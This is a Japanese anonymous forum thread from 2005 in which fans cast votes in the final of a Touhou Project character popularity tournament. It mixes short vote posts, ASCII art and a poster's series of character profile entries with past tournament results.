[[TH12-wQ2EbeaJ-JB]]
<<さくぽっぽ>>
東方CATV

110名無しさん:2005/03/12(土) 00:08:01 ID:4dFmp9cA
[[TH12-dFg1cYQP-JB]]
<<さくぽっぽ>>
東方CATV

111名無しさん:2005/03/12(土) 00:08:19 ID:xFcFmJQM
[[TH12-HIc7L2mk-MC]]
完全で瀟洒なちょっと抜けたとこある悪魔の狗
<<十六夜咲夜>>に一票
メイド長、あなたは素敵過ぎです

112名無しさん:2005/03/12(土) 00:08:38 ID:AE4uKnuI
[[TH12-/ESgLaUL-JZ]]
<<さくぽっぽ>>
東方CATV

113名無しさん:2005/03/12(土) 00:08:40 ID:tybA4ML.
[[TH12-oErtSQRL-JC]]
<<十六夜咲夜>>
に一票。
最後の戦い、その果てに栄光を!

114名無しさん:2005/03/12(土) 00:08:40 ID:TQkdOWNg
[[TH12-9ncLbItK-MJ]]
<<十六夜咲夜>>さんに一票!!
ガンバレー。

115名無しさん:2005/03/12(土) 00:08:42 ID:XgVNA1gU
[[TH12-YENPOwEc-MB]]
悩んだ・・・今回は観戦だけにしようかとするほど悩んだ。
だがっ!俺は!
俺は<<紅 美鈴>>に入れる!!
すまんっ、咲夜さん!

116名無しさん:2005/03/12(土) 00:08:57 ID:NYMXSBK2
[[TH12-qCjUzBpC-JZ]]
<<さくぽっぽ>>
東方CATV

117名無しさん:2005/03/12(土) 00:09:07 ID:sm4VT5yc
[[TH12-0duVkm7g-MZ]]
準決勝のFlashにマジ感動したぞ!
そんな訳で本名で投票してあげよう。
<<紅 美鈴>>に心より一票!
目指せ下克上!!
そして散れ!!華やかに!<ェー

118名無しさん:2005/03/12(土) 00:09:36 ID:hNcB0qdQ
[[TH12-GJjHpKI2-MD]]

\<<もこ>>に一票
   ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ,-へ,  , ヘ
    ,ヽ_,_i=/__,」       ,..::─::::..、
   ,'   `ー' ヽ    ,;'==-::::::.:.:.ヽ
   i <〈」iノハル.!〉   .!:.i;:r''i;:」:.>i゙:.i
   i L>゚ ー ゚ノiゝ .目  |::i、゚ヮ ゚_i|;:i;::i
  i>i ir^i `T´i'i |  ‖ .|::iく/i_,ゝ`y';::!
  .i>i !>^ `''´'iイ|  ‖ |〈.!_§_,:゙i_,〉;::〉
   i.ル'ヽr_rr_r'レ'  ‖ `〈,、_,.__.、;.、>´
   ___________∧________
 /            <<てるよ>>に一票

\ 何おぅ!
   ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ,-へ,  , ヘ
    ,ヽ_,_i=/__,」       ,..::─::::..、
   ,'   `ー' ヽ    ,;'==-::::::.:.:.ヽ  
   i <〈」iノハル.!〉   .!:.i;:r''i;:」:.>i゙:.i
   i L>゚ д゚ノiゝ .目  |::i、゚ - ゚_i|;:i;::i
  i>i ir^i `T´i'i |  ‖ .|::iく/i_,ゝ`y';::!
  .i>i !>^ `''´'iイ|  ‖ |〈.!_§_,:゙i_,〉;::〉
   i.ル'ヽr_rr_r'レ'  ‖ `〈,、_,.__.、;.、>´
   ___________∧________
 /               なにさ!

\・・・じゃあ間を取って<<ひの>>に一票
   ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ,-へ,  , ヘ
    ,ヽ_,_i=/__,」       ,..::─::::..、
   ,'   `ー' ヽ    ,;'==-::::::.:.:.ヽ
   i <〈」iノハル.!〉   .!:.i;:r''i;:」:.>i゙:.i
   i L>゚ ー ゚ノiゝ .目  |::i、゚ヮ ゚_i|;:i;::i
  i>i ir^i `T´i'i |  ‖ .|::iく/i_,ゝ`y';::!
  .i>i !>^ `''´'iイ|  ‖ |〈.!_§_,:゙i_,〉;::〉
   i.ル'ヽr_rr_r'レ'  ‖ `〈,、_,.__.、;.、>´
   ___________∧________
 /          HI・GI・I! HI・GI・I!

119東方キャラ名鑑:2005/03/12(土) 00:10:01 ID:UCKCRGos
勝者の陰には敗者有り。
激戦の末敗れ去っていったキャラクター達にもう一度光を。
          _______________
          l                      |
          |     〜東方キャラ名鑑〜     |
          |                       |
          |  ┏━━━━━━━━━━━┓ |
          |  ┗┳┳━━┃博┃━━┳┳┛ |
          |  ┏┻┻━━┃麗┃━━━━┓ |
          |  ┗┳┳━━━━━━━┳┳┛ |
          |    ┃┃              ┃┃   |
          |    ┃┃              ┃┃   |
          |    ┃┃              ┃┃   |
          |    ┃┃              ┃┃   |
          |    ┃┃              ┃┃   |
          |                       |
          |    著 名前が無い程度の能力 |
          | ______________|
             ( ______________(

元ネタ:
葉鍵キャラ名鑑
http://www.geocities.co.jp/CollegeLife-Club/7442/moemoe/moemoe.html

自分には妄想力が足りない… どなたか詳細スペック書いてください…(´Дと
一部自分の想像が入ってます。手助け歓迎中よ。

120名無しさん:2005/03/12(土) 00:10:01 ID:UztsKSGU
[[TH12-2mLtsq5u-JZ]]
<<十六夜咲夜>>さんに全てを賭ける!!

121名無しさん:2005/03/12(土) 00:10:02 ID:SbRlKEj2
[[TH12-gDWYHQCi-MH]]
<<十六夜咲夜>>に一票。
前回は初戦敗退だっただけに、まさかこの組み合わせが実現するとは思いませんでした。
ここまで勝ち抜いてきた瀟洒なわんこに、最後は一番上に立っていて欲しい!
がんばれメイド長!
決勝でうっかりだけは勘弁な!

122名無しさん:2005/03/12(土) 00:10:08 ID:LD8MriyI
[[TH12-I1ff0ml.-JD]]
明日が本番だと思ってる
今は<<咲夜さん>>に一票!

123名無しさん:2005/03/12(土) 00:10:11 ID:.1h0tWMQ
[[TH12-2qXbLAFL-MZ]]
最後なのでフルネームで<<紅美鈴>>に投票。
優勝目指して頑張ってクレイ。

なおCATV品川だが重なる人もいるまい。

124名無しさん:2005/03/12(土) 00:10:29 ID:VphJDYM2
[[TH12-pLnc94V4-MB]]
    _, ,_ ∩
  ( ゚∀゚)彡 めーりんめーりん!
   ⊂彡
え、なに?えーりんの間違い?
まぁ、いいじゃないですか。
ってことで<<紅美鈴>>に最後の1票です。

125名無しさん:2005/03/12(土) 00:10:47 ID:K7bXtInw
[[TH12-pZ0zpiit-MZ]]

<<十六夜 咲夜>>さんに一票。
素敵過ぎます。がんばれ!!

126東方キャラ名鑑:2005/03/12(土) 00:11:00 ID:UCKCRGos
東方キャラ名鑑 キャラクターNo.001
           博麗霊夢(全東方シリーズ自機、永夜抄4A面ボス)

  .「^ヽ,ry'^i
  ,ゝ"´ ⌒`ヽ   /[] ナニヨ!       楽園の素敵な巫女
 くi Lノノハノ)」  / []] ムソーフーイン!
  λ.[i ゚ ヮ゚ノi! / [] []            空を飛ぶ程度の能力
  レ',ヘ.i`ム'」つ/ [] [][]
 ,く_,//T.rヽ
  `!,ン'''´'-'

人気投票:3位/3位/3位/6位

第1回最萌:ベスト4(153-133ルナサ 151-108フラン 150-152幽々子)

第2回最萌:2回戦敗退(724-505小悪魔 645-720アリス)
       総得票数:1369 平均得票数:684.50(8位)

身長:やや高い
年齢:見た目まんま(13〜15くらい?)
職業:巫女
乳サイズ:並
性格:まったり
趣味:掃除・お茶

127名無しさん:2005/03/12(土) 00:11:35 ID:/BzybV46
>>100
いっそ<くこのトーナメントの支援全部>>に入れたいくらいだけど
もう少し様子を見ます

128名無しさん:2005/03/12(土) 00:11:50 ID:QNy5CqzM
[[TH12-MjpkY334-JK]]
美鈴もすごいと思う、
ここまで勝ち抜いてきた
今まで何回か投票もした。
でも、私は咲夜さんを応援する。
理由なんて一つしかない
だから自分に正直になる
中国に同情もしない
もう迷わない。
「私は本当に
 <<十六夜咲夜>>
 に萌えている。」

129東方キャラ名鑑:2005/03/12(土) 00:12:00 ID:UCKCRGos
東方キャラ名鑑 キャラクターNo.002
           霧雨魔理沙(夢・幻・怪・紅・妖・永・萃自機、永夜抄4B面ボス)
   ______
  ´>  `ヽ、
 _,.'-=[><]=.,_             普通の魔法使い
 ヽi <レノλノ)レ〉' ワタシハ フツウダゼ?
  ノレ§゚ ヮ゚ノiゝ  //            魔法を使う程度の能力
   `k:_(つ(つ ○)===========
  ,く/::i!___i!i   ヽ\
  `~ヽ,_i'ヽ,i"

人気投票:1位/2位/1位/1位

第1回最萌:3回戦敗退(169-91紫 142-33魅魔 137-140パチュリー)

第2回最萌:2回戦敗退(663-437ミスティア 641-644フランドール)
       総得票数:1304 平均得票数:652.00(11位)

身長:やや低い
年齢:見た目まんま(13〜15くらい?)
職業:魔法使い
乳サイズ:やや控えめ
性格:努力家
趣味:蒐集

130名無しさん:2005/03/12(土) 00:12:01 ID:joCFXvBc
[[TH12-EECdXSXs-MA]]
<<十六夜咲夜>>に一票。
俺はあなたが大好きです。

131名無しさん:2005/03/12(土) 00:12:32 ID:KqPyqurM
[[TH12-UKr.kQEM-ME]]
<<紅美鈴>>に一票。
最初で最後の本名投票。

132名無しさん:2005/03/12(土) 00:12:59 ID:4aN3ZKt6
[[TH12-GnOFRnJr-MZ]]
<<咲夜>>さんに。
メイド長萌え。

133東方キャラ名鑑:2005/03/12(土) 00:13:00 ID:UCKCRGos
東方キャラ名鑑 キャラクターNo.003
           ルーミア(紅魔郷1面ボス)

    ,. -ー- 、__
   ,'     '.y´           宵闇の妖怪
   i レノノハノノ) ソーナノカー
   ハルi ゚ ヮ゚ノリ               闇を操る程度の能力
   と,))::∞:!iつ
    ,く::/_:::!:」
    `゙!_フi_フ´

人気投票:13位/16位/16位/19位

第1回最萌:3回戦敗退(158-115橙 119-129美鈴)

第2回最萌:3回戦敗退(360-214幽香 314-541アリス)
       総得票数:674 平均得票数:337.00(28位)

身長:低い
年齢:不明(人間の10〜12くらい?)
職業:不明
乳サイズ:微かな膨らみ
性格:素直・無邪気・食いしん坊
趣味:月光浴

134名無しさん:2005/03/12(土) 00:13:08 ID:MBFxdTf.
[[TH12-GjdPoaTs-MB]]
最萌え決勝と聞けば
自らの最萌えキャラに投票するしかない!!!
無効上等!無意味歓迎!
<<八雲 紫>>に一票!!!!!!!
生まれて初めて絵もかいたぜぇぇ!!!
こんなのに3日かかったぞぉぉぉぉぉぉ!!!!!
http://thm.just-size.net/up/src/thm21153.jpg

135名無しさん:2005/03/12(土) 00:13:16 ID:ZZaXS05c
[[TH12-64DxkXHj-MD]]
もはや言葉はいるまい・・・
<<紅美鈴>>に一票。

136名無しさん:2005/03/12(土) 00:13:21 ID:GHTOXQ/2
[[TH12-4OayTwBZ-MN]]

<<十六夜咲夜>>に一票。
最後まで完全で瀟洒に勝ってくれ。

137名無しさん:2005/03/12(土) 00:13:22 ID:yphjL8F6
[[TH12-sWxK1Opq-MZ]]
<<チルノ>>大好きだぜ!!
↓ヘタレ絵支援
http://thm.just-size.net/up/src/thm21157.jpg

東方CATV

138名無しさん:2005/03/12(土) 00:13:23 ID:NJwgW/cY
紅美鈴「さぁくやぁぁぁぁぁぁ―――!!!!」
咲夜「さんを付けろよ中国野郎ぉぉぉぉぉぉ―――!!!!」

まだだ!
まだ投票せんよ!




掲示板管理者へ連絡 無料レンタル掲示板